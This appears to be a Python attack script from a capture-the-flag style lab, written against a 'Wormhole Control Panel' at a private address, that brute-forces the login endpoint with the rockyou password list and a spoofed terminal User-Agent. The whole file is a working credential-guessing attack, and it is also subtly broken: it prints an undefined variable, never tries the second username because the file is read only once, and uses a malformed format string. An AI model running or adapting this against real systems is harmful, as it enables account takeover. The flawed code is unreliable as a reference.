50 lines
1.7 KiB
Python
50 lines
1.7 KiB
Python
import requests
|
|
import json
|
|
import os
|
|
|
|
#{
|
|
# "service": "Wormhole Control Panel",
|
|
# "endpoints": {
|
|
# "\/terminal.php?action=info": "Public info",
|
|
# "\/terminal.php?action=login": "POST: username,password",
|
|
# "\/terminal.php?action=pin": "POST: attempt PIN to get temporary admin token",
|
|
# "\/terminal.php?action=status": "GET: wormhole status",
|
|
# "\/terminal.php?action=close": "POST: close wormhole"
|
|
# },
|
|
# "note": "This panel only answers to terminal user agents. Use the endpoints to fully close the wormhole."
|
|
#}
|
|
|
|
def main():
|
|
wordlist = "/usr/share/wordlists/rockyou.txt"
|
|
url = "10.81.152.59"
|
|
proto = "http"
|
|
target = "terminal.php?action=login"
|
|
user_agent = "secretcomputer"
|
|
headers = {"User-Agent": user_agent}
|
|
username = ["user", "admin"]
|
|
|
|
lines = int(os.popen(f"wc -l {wordlist}").read().split()[0])
|
|
print(lines)
|
|
count = 0
|
|
|
|
try:
|
|
with open(wordlist, 'r') as file:
|
|
for user in username:
|
|
for word in file:
|
|
count += 1
|
|
print(f"Bruteforce in progress: {count/2/lines:0.000000f}%", end="\r")
|
|
data = {"username": user, "password": word}
|
|
response = requests.post(f"{proto}://{url}/{target}", data=data, headers=headers).json()
|
|
if isinstance(response, dict):
|
|
if response["status"] != "fail":
|
|
print(f"Credentials found: {user}:{password}")
|
|
except FileNotFoundError:
|
|
print("File not found")
|
|
return
|
|
except Exception as e:
|
|
print(f"An Error occured: {e}")
|
|
return
|
|
|
|
if __name__ == "__main__":
|
|
main()
|